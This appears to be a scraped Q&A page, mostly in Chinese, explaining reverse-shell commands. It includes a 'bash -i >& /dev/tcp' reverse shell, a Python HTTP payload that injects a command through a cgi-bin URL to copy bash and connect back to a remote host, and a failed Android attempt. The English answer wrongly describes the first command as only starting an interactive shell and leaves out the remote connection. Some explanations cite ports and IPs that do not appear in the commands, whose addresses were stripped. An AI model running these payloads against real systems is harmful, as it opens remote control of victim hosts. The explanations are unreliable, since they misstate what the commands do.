/bin/sh -c bash -i >& /dev/tcp/ 0>&1 这是什么意思
时间: 2023-12-17 11:04:56 浏览: 67
This command starts a new interactive bash shell.
The `bash` command is used to start the bash shell, and the `-i` option specifies that the shell should be interactive.
The `/bin/sh -c` portion of the command is used to execute a command in a new shell. In this case, the command being executed is the interactive bash shell.
The `>` symbol at the end of the command is a shell redirection operator, which means that any output from the interactive bash shell will be redirected to the standard output stream.
payload = b"GET /cgi-bin/echo?`cp /bin/bash /tmp/bash; chmod +x /tmp/bash; /tmp/bash -i >& /dev/tcp/ 0>&1` HTTP/1.1\r\nHost: " + ip.encode() + b"\r\n\r\n"
这是一个 HTTP 请求的 payload,其中包含一个命令注入的攻击代码。具体来说,这个 payload 中的命令注入代码会将本地的 /bin/bash 复制到 /tmp/bash,然后将 /tmp/bash 设为可执行文件,最后将其以交互模式运行,并将输出重定向到 IP 地址为,端口为 8888 的远程主机上。这是一个非常危险的攻击,可以让攻击者远程控制受害主机。因此,如果你收到这样的 payload,应该立即采取措施防止攻击。
console:/ # bash -i &> /dev/tcp/ 0<&1 /system/bin/sh: can't create /dev/tcp/ No such file or directory
这是一条命令,它的作用是将当前的bash shell连接到IP地址为192.168.137.1,端口号为6666的远程主机上。但是,由于在Android系统中,/dev/tcp和/dev/udp这两个特殊文件并不存在,因此会出现“can't create /dev/tcp/ No such file or directory”的错误提示。